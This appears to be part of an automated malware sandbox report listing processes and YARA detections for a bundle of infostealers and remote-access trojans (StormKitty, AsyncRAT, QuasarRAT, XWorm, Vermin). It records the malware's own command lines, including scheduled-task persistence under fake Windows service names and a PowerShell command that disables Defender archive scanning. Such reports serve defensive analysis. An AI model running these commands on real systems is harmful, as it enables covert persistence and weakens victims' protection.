                                                  • Rule: JoeSecurity_StormKitty, Description: Yara detected StormKitty Stealer, Source: 00000004.00000000.2005216319.00000000005B2000.00000002.00000001.01000000.00000008.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000000.2005216319.00000000005B2000.00000002.00000001.01000000.00000008.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000004.00000000.2005216319.00000000005B2000.00000002.00000001.01000000.00000008.sdmp, Author: Joe Security
                                                  • Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: 00000004.00000000.2005216319.00000000005B2000.00000002.00000001.01000000.00000008.sdmp, Author: ditekSHen
                                                  • Rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex, Description: Detects executables referencing Discord tokens regular expressions, Source: 00000004.00000000.2005216319.00000000005B2000.00000002.00000001.01000000.00000008.sdmp, Author: ditekSHen
                                                  • Rule: JoeSecurity_WorldWindStealer, Description: Yara detected WorldWind Stealer, Source: 00000004.00000002.4469429984.0000000002D11000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_StormKitty, Description: Yara detected StormKitty Stealer, Source: 00000004.00000002.4469429984.0000000002D11000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.4469429984.0000000002D11000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000004.00000002.4469429984.0000000002D11000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex, Description: Detects executables referencing Discord tokens regular expressions, Source: 00000004.00000002.4469429984.0000000002D11000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                  • Rule: JoeSecurity_WorldWindStealer, Description: Yara detected WorldWind Stealer, Source: C:\Users\user\AppData\Roaming\svchost.exe, Author: Joe Security
                                                  • Rule: JoeSecurity_TelegramRecon, Description: Yara detected Telegram Recon, Source: C:\Users\user\AppData\Roaming\svchost.exe, Author: Joe Security
                                                  • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: C:\Users\user\AppData\Roaming\svchost.exe, Author: Joe Security
                                                  • Rule: JoeSecurity_StormKitty, Description: Yara detected StormKitty Stealer, Source: C:\Users\user\AppData\Roaming\svchost.exe, Author: Joe Security
                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: C:\Users\user\AppData\Roaming\svchost.exe, Author: Joe Security
                                                  • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Roaming\svchost.exe, Author: Joe Security
                                                  • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: C:\Users\user\AppData\Roaming\svchost.exe, Author: Joe Security
                                                  • Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: C:\Users\user\AppData\Roaming\svchost.exe, Author: ditekSHen
                                                  • Rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex, Description: Detects executables referencing Discord tokens regular expressions, Source: C:\Users\user\AppData\Roaming\svchost.exe, Author: ditekSHen
                                                  • Rule: INDICATOR_SUSPICIOUS_EXE_References_VPN, Description: Detects executables referencing many VPN software clients. Observed in infosteslers, Source: C:\Users\user\AppData\Roaming\svchost.exe, Author: ditekSHen
                                                  • Rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID, Description: Detects executables referencing Windows vault credential objects. Observed in infostealers, Source: C:\Users\user\AppData\Roaming\svchost.exe, Author: ditekSHen
                                                  • Rule: MALWARE_Win_StormKitty, Description: Detects StormKitty infostealer, Source: C:\Users\user\AppData\Roaming\svchost.exe, Author: ditekSHen
                                                  Antivirus matches:
                                                  • Detection: 100%, ReversingLabs
                                                  Reputation:low
                                                  Has exited:false

                                                  General

                                                  Target ID:5
                                                  Start time:00:15:54
                                                  Start date:03/09/2024
                                                  Path:C:\Users\user\AppData\Roaming\update.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Users\user\AppData\Roaming\update.exe"
                                                  Imagebase:0xc60000
                                                  File size:230'912 bytes
                                                  MD5 hash:B8DF7316CC35A0FB6FE3A326B4283010
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_WorldWindStealer, Description: Yara detected WorldWind Stealer, Source: 00000005.00000000.2006488022.0000000000C73000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000005.00000000.2006488022.0000000000C73000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_StormKitty, Description: Yara detected StormKitty Stealer, Source: 00000005.00000000.2006488022.0000000000C73000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000000.2006488022.0000000000C73000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000005.00000000.2006488022.0000000000C73000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                  • Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: 00000005.00000000.2006488022.0000000000C73000.00000002.00000001.01000000.0000000A.sdmp, Author: ditekSHen
                                                  • Rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex, Description: Detects executables referencing Discord tokens regular expressions, Source: 00000005.00000000.2006488022.0000000000C73000.00000002.00000001.01000000.0000000A.sdmp, Author: ditekSHen
                                                  • Rule: JoeSecurity_StormKitty, Description: Yara detected StormKitty Stealer, Source: 00000005.00000002.4469944759.0000000002F61000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.4469944759.0000000002F61000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex, Description: Detects executables referencing Discord tokens regular expressions, Source: 00000005.00000002.4469944759.0000000002F61000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                  • Rule: JoeSecurity_WorldWindStealer, Description: Yara detected WorldWind Stealer, Source: 00000005.00000002.4469944759.0000000003575000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_WorldWindStealer, Description: Yara detected WorldWind Stealer, Source: 00000005.00000002.4469944759.00000000033D9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_WorldWindStealer, Description: Yara detected WorldWind Stealer, Source: C:\Users\user\AppData\Roaming\update.exe, Author: Joe Security
                                                  • Rule: JoeSecurity_TelegramRecon, Description: Yara detected Telegram Recon, Source: C:\Users\user\AppData\Roaming\update.exe, Author: Joe Security
                                                  • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: C:\Users\user\AppData\Roaming\update.exe, Author: Joe Security
                                                  • Rule: JoeSecurity_StormKitty, Description: Yara detected StormKitty Stealer, Source: C:\Users\user\AppData\Roaming\update.exe, Author: Joe Security
                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: C:\Users\user\AppData\Roaming\update.exe, Author: Joe Security
                                                  • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Roaming\update.exe, Author: Joe Security
                                                  • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: C:\Users\user\AppData\Roaming\update.exe, Author: Joe Security
                                                  • Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: C:\Users\user\AppData\Roaming\update.exe, Author: ditekSHen
                                                  • Rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex, Description: Detects executables referencing Discord tokens regular expressions, Source: C:\Users\user\AppData\Roaming\update.exe, Author: ditekSHen
                                                  • Rule: INDICATOR_SUSPICIOUS_EXE_References_VPN, Description: Detects executables referencing many VPN software clients. Observed in infosteslers, Source: C:\Users\user\AppData\Roaming\update.exe, Author: ditekSHen
                                                  • Rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID, Description: Detects executables referencing Windows vault credential objects. Observed in infostealers, Source: C:\Users\user\AppData\Roaming\update.exe, Author: ditekSHen
                                                  Antivirus matches:
                                                  • Detection: 96%, ReversingLabs
                                                  Reputation:low
                                                  Has exited:false

                                                  General

                                                  Target ID:6
                                                  Start time:00:15:54
                                                  Start date:03/09/2024
                                                  Path:C:\Users\user\AppData\Roaming\Window Security.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Users\user\AppData\Roaming\Window Security.exe"
                                                  Imagebase:0xce0000
                                                  File size:547'328 bytes
                                                  MD5 hash:81B2C5C64951B603480D40D321540FF2
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_Vermin, Description: Yara detected Vermin Keylogger, Source: 00000006.00000000.2008053302.0000000000CE2000.00000002.00000001.01000000.0000000B.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000000.2008053302.0000000000CE2000.00000002.00000001.01000000.0000000B.sdmp, Author: Joe Security
                                                  • Rule: Windows_Trojan_Quasarrat_e52df647, Description: unknown, Source: 00000006.00000000.2008053302.0000000000CE2000.00000002.00000001.01000000.0000000B.sdmp, Author: unknown
                                                  • Rule: JoeSecurity_Vermin, Description: Yara detected Vermin Keylogger, Source: C:\Users\user\AppData\Roaming\Window Security.exe, Author: Joe Security
                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: C:\Users\user\AppData\Roaming\Window Security.exe, Author: Joe Security
                                                  • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Roaming\Window Security.exe, Author: Joe Security
                                                  • Rule: Windows_Trojan_Quasarrat_e52df647, Description: unknown, Source: C:\Users\user\AppData\Roaming\Window Security.exe, Author: unknown
                                                  • Rule: Quasar_RAT_1, Description: Detects Quasar RAT, Source: C:\Users\user\AppData\Roaming\Window Security.exe, Author: Florian Roth
                                                  • Rule: Quasar_RAT_2, Description: Detects Quasar RAT, Source: C:\Users\user\AppData\Roaming\Window Security.exe, Author: Florian Roth
                                                  • Rule: MAL_QuasarRAT_May19_1, Description: Detects QuasarRAT malware, Source: C:\Users\user\AppData\Roaming\Window Security.exe, Author: Florian Roth
                                                  • Rule: Vermin_Keylogger_Jan18_1, Description: Detects Vermin Keylogger, Source: C:\Users\user\AppData\Roaming\Window Security.exe, Author: Florian Roth
                                                  • Rule: xRAT_1, Description: Detects Patchwork malware, Source: C:\Users\user\AppData\Roaming\Window Security.exe, Author: Florian Roth
                                                  • Rule: CN_disclosed_20180208_KeyLogger_1, Description: Detects malware from disclosed CN malware set, Source: C:\Users\user\AppData\Roaming\Window Security.exe, Author: Florian Roth
                                                  • Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: C:\Users\user\AppData\Roaming\Window Security.exe, Author: Florian Roth
                                                  • Rule: INDICATOR_SUSPICIOUS_DisableWinDefender, Description: Detects executables containing artifcats associated with disabling Widnows Defender, Source: C:\Users\user\AppData\Roaming\Window Security.exe, Author: ditekSHen
                                                  • Rule: MALWARE_Win_QuasarRAT, Description: QuasarRAT payload, Source: C:\Users\user\AppData\Roaming\Window Security.exe, Author: ditekSHen
                                                  Antivirus matches:
                                                  • Detection: 100%, ReversingLabs
                                                  Reputation:low
                                                  Has exited:true

                                                  General

                                                  Target ID:7
                                                  Start time:00:15:54
                                                  Start date:03/09/2024
                                                  Path:C:\Users\user\AppData\Roaming\Windows Defender Service Host.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Users\user\AppData\Roaming\Windows Defender Service Host.exe"
                                                  Imagebase:0xf60000
                                                  File size:44'032 bytes
                                                  MD5 hash:5322A12CB24E83BFA9746FBDE06D07E7
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000007.00000000.2009427541.0000000000F62000.00000002.00000001.01000000.0000000C.sdmp, Author: Joe Security
                                                  • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000007.00000000.2009427541.0000000000F62000.00000002.00000001.01000000.0000000C.sdmp, Author: ditekSHen
                                                  • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exe, Author: Joe Security
                                                  • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exe, Author: Joe Security
                                                  • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exe, Author: ditekSHen
                                                  Antivirus matches:
                                                  • Detection: 81%, ReversingLabs
                                                  Reputation:low
                                                  Has exited:false

                                                  General

                                                  Target ID:8
                                                  Start time:00:15:57
                                                  Start date:03/09/2024
                                                  Path:C:\Windows\System32\cmd.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Windows Security Health Service" /tr '"C:\Users\user\AppData\Roaming\Windows Security Health Service.exe"' & exit
                                                  Imagebase:0x7ff7b77f0000
                                                  File size:289'792 bytes
                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  General

                                                  Target ID:9
                                                  Start time:00:15:57
                                                  Start date:03/09/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff6d64d0000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  General

                                                  Target ID:10
                                                  Start time:00:15:57
                                                  Start date:03/09/2024
                                                  Path:C:\Windows\System32\cmd.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpE306.tmp.bat""
                                                  Imagebase:0x7ff7b77f0000
                                                  File size:289'792 bytes
                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  General

                                                  Target ID:11
                                                  Start time:00:15:57
                                                  Start date:03/09/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff6d64d0000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  General

                                                  Target ID:12
                                                  Start time:00:15:57
                                                  Start date:03/09/2024
                                                  Path:C:\Windows\System32\schtasks.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:schtasks /create /f /sc onlogon /rl highest /tn "Windows Security Health Service" /tr '"C:\Users\user\AppData\Roaming\Windows Security Health Service.exe"'
                                                  Imagebase:0x7ff6078f0000
                                                  File size:235'008 bytes
                                                  MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  General

                                                  Target ID:13
                                                  Start time:00:15:57
                                                  Start date:03/09/2024
                                                  Path:C:\Windows\SysWOW64\schtasks.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"schtasks" /create /tn "Windows Update" /sc ONLOGON /tr "C:\Users\user\AppData\Roaming\Window Security.exe" /rl HIGHEST /f
                                                  Imagebase:0xa00000
                                                  File size:187'904 bytes
                                                  MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  General

                                                  Target ID:14
                                                  Start time:00:15:57
                                                  Start date:03/09/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff6d64d0000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  General

                                                  Target ID:15
                                                  Start time:00:15:57
                                                  Start date:03/09/2024
                                                  Path:C:\Windows\System32\timeout.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:timeout 3
                                                  Imagebase:0x7ff76b1a0000
                                                  File size:32'768 bytes
                                                  MD5 hash:100065E21CFBBDE57CBA2838921F84D6
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:moderate
                                                  Has exited:true

                                                  General

                                                  Target ID:16
                                                  Start time:00:15:57
                                                  Start date:03/09/2024
                                                  Path:C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exe"
                                                  Imagebase:0x1e0000
                                                  File size:547'328 bytes
                                                  MD5 hash:81B2C5C64951B603480D40D321540FF2
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_Vermin, Description: Yara detected Vermin Keylogger, Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exe, Author: Joe Security
                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exe, Author: Joe Security
                                                  • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exe, Author: Joe Security
                                                  • Rule: Windows_Trojan_Quasarrat_e52df647, Description: unknown, Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exe, Author: unknown
                                                  • Rule: Quasar_RAT_1, Description: Detects Quasar RAT, Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exe, Author: Florian Roth
                                                  • Rule: Quasar_RAT_2, Description: Detects Quasar RAT, Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exe, Author: Florian Roth
                                                  • Rule: MAL_QuasarRAT_May19_1, Description: Detects QuasarRAT malware, Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exe, Author: Florian Roth
                                                  • Rule: Vermin_Keylogger_Jan18_1, Description: Detects Vermin Keylogger, Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exe, Author: Florian Roth
                                                  • Rule: xRAT_1, Description: Detects Patchwork malware, Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exe, Author: Florian Roth
                                                  • Rule: CN_disclosed_20180208_KeyLogger_1, Description: Detects malware from disclosed CN malware set, Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exe, Author: Florian Roth
                                                  • Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exe, Author: Florian Roth
                                                  • Rule: INDICATOR_SUSPICIOUS_DisableWinDefender, Description: Detects executables containing artifcats associated with disabling Widnows Defender, Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exe, Author: ditekSHen
                                                  • Rule: MALWARE_Win_QuasarRAT, Description: QuasarRAT payload, Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exe, Author: ditekSHen
                                                  Antivirus matches:
                                                  • Detection: 100%, ReversingLabs
                                                  Reputation:low
                                                  Has exited:false

                                                  General

                                                  Target ID:17
                                                  Start time:00:15:57
                                                  Start date:03/09/2024
                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"powershell" Get-MpPreference -verbose
                                                  Imagebase:0xa30000
                                                  File size:433'152 bytes
                                                  MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  General

                                                  Target ID:18
                                                  Start time:00:15:57
                                                  Start date:03/09/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff6d64d0000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  General

                                                  Target ID:19
                                                  Start time:00:15:57
                                                  Start date:03/09/2024
                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpE49C.tmp.cmd""
                                                  Imagebase:0x790000
                                                  File size:236'544 bytes
                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:20
                                                  Start time:00:15:57
                                                  Start date:03/09/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff6d64d0000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:21
                                                  Start time:00:15:58
                                                  Start date:03/09/2024
                                                  Path:C:\Users\user\AppData\Roaming\Windows Security Health Service.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Users\user\AppData\Roaming\Windows Security Health Service.exe"
                                                  Imagebase:0xb60000
                                                  File size:75'776 bytes
                                                  MD5 hash:0DFA83A82F6418C73406D78296DE61BE
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: C:\Users\user\AppData\Roaming\Windows Security Health Service.exe, Author: Joe Security
                                                  • Rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice, Description: Detects executables attemping to enumerate video devices using WMI, Source: C:\Users\user\AppData\Roaming\Windows Security Health Service.exe, Author: ditekSHen
                                                  Antivirus matches:
                                                  • Detection: 87%, ReversingLabs
                                                  Has exited:true

                                                  General

                                                  Target ID:22
                                                  Start time:00:15:58
                                                  Start date:03/09/2024
                                                  Path:C:\Windows\System32\schtasks.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Windows Defender Service Host" /tr "C:\Users\user\AppData\Roaming\Windows Defender Service Host.exe"
                                                  Imagebase:0x7ff6078f0000
                                                  File size:235'008 bytes
                                                  MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:23
                                                  Start time:00:15:59
                                                  Start date:03/09/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff6d64d0000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:24
                                                  Start time:00:15:59
                                                  Start date:03/09/2024
                                                  Path:C:\Users\user\AppData\Roaming\Window Security.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Users\user\AppData\Roaming\Window Security.exe"
                                                  Imagebase:0xa80000
                                                  File size:547'328 bytes
                                                  MD5 hash:81B2C5C64951B603480D40D321540FF2
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:25
                                                  Start time:00:16:00
                                                  Start date:03/09/2024
                                                  Path:C:\Windows\SysWOW64\timeout.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:timeout 4
                                                  Imagebase:0xdc0000
                                                  File size:25'088 bytes
                                                  MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:26
                                                  Start time:00:16:01
                                                  Start date:03/09/2024
                                                  Path:C:\Users\user\AppData\Roaming\Windows Security Health Service.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Users\user\AppData\Roaming\Windows Security Health Service.exe"
                                                  Imagebase:0xb30000
                                                  File size:75'776 bytes
                                                  MD5 hash:0DFA83A82F6418C73406D78296DE61BE
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:false

                                                  General

                                                  Target ID:27
                                                  Start time:00:16:01
                                                  Start date:03/09/2024
                                                  Path:C:\Users\user\AppData\Roaming\Windows Defender Service Host.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Users\user\AppData\Roaming\Windows Defender Service Host.exe"
                                                  Imagebase:0x10000
                                                  File size:44'032 bytes
                                                  MD5 hash:5322A12CB24E83BFA9746FBDE06D07E7
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:28
                                                  Start time:00:16:02
                                                  Start date:03/09/2024
                                                  Path:C:\Windows\SysWOW64\schtasks.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"schtasks" /create /tn "Windows Update" /sc ONLOGON /tr "C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exe" /rl HIGHEST /f
                                                  Imagebase:0xa00000
                                                  File size:187'904 bytes
                                                  MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:29
                                                  Start time:00:16:03
                                                  Start date:03/09/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff6d64d0000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:31
                                                  Start time:00:16:07
                                                  Start date:03/09/2024
                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableArchiveScanning $true
                                                  Imagebase:0xa30000
                                                  File size:433'152 bytes
                                                  MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:32
                                                  Start time:00:16:07
                                                  Start date:03/09/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff6d64d0000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
